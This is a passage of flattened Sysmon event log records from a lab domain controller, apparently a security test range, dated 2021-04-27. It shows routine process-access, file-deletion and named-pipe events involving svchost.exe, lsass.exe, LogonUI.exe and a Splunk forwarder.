dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440832Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.598{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440831Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.598{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440830Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.594{42DC5269-CE99-6086-0E00-00000000BA01}10165872C:\Windows\System32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\termsrv.dll+a1087|c:\windows\system32\termsrv.dll+6aa58|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440829Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.593{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440828Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.593{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440827Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.593{42DC5269-CE96-6086-0B00-00000000BA01}6286328C:\Windows\system32\lsass.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440826Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.593{42DC5269-CE96-6086-0B00-00000000BA01}6286328C:\Windows\system32\lsass.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440825Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.521{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FF060478E500C337C8A1FC5AA7FC3180,SHA256=C735F31679F6FD714B8B6A2B0F1835F8C14BC4CE277E67CE942D72F3D6B88A31,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440824Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.521{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440823Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.521{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440822Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.520{42DC5269-CE96-6086-0B00-00000000BA01}6286328C:\Windows\system32\lsass.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440821Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.520{42DC5269-CE96-6086-0B00-00000000BA01}6286328C:\Windows\system32\lsass.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440820Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.520{42DC5269-CE99-6086-0E00-00000000BA01}10166840C:\Windows\System32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\termsrv.dll+a1087|c:\windows\system32\termsrv.dll+6aa58|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440819Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.519{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440818Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.519{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440817Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.515{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=253D3ABAC35569C2739EA58C4E97E91D,SHA256=DD575A2B6D7FC4F48217751EC37E7B9BFCCCBF77E3EE2EAA7BA075C021973474,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440816Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.481{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1700-00000000BA01}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440815Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.480{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000440814Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.480{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-0E00-00000000BA01}1016C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 18141800x8000000000000000440813Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-ConnectPipe2021-04-27 12:24:43.480{42DC5269-CE99-6086-0E00-00000000BA01}1016\TSVCPIPE-69b67095-441f-4faa-93f1-e17fb1a8b219C:\Windows\System32\svchost.exe 10341000x8000000000000000440812Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.479{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440811Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.479{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440810Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.479{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440809Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.477{42DC5269-CE99-6086-1100-00000000BA01}3401564C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440808Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.477{42DC5269-CE99-6086-1100-00000000BA01}3401564C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440807Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.476{42DC5269-CE99-6086-1100-00000000BA01}3401564C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440806Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.476{42DC5269-CE99-6086-1100-00000000BA01}3401564C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x8000000000000000440805Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-ConnectPipe2021-04-27 12:24:43.456{42DC5269-CE99-6086-0E00-00000000BA01}1016\TSVCPIPE-69b67095-441f-4faa-93f1-e17fb1a8b219C:\Windows\System32\svchost.exe 18141800x8000000000000000440804Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-ConnectPipe2021-04-27 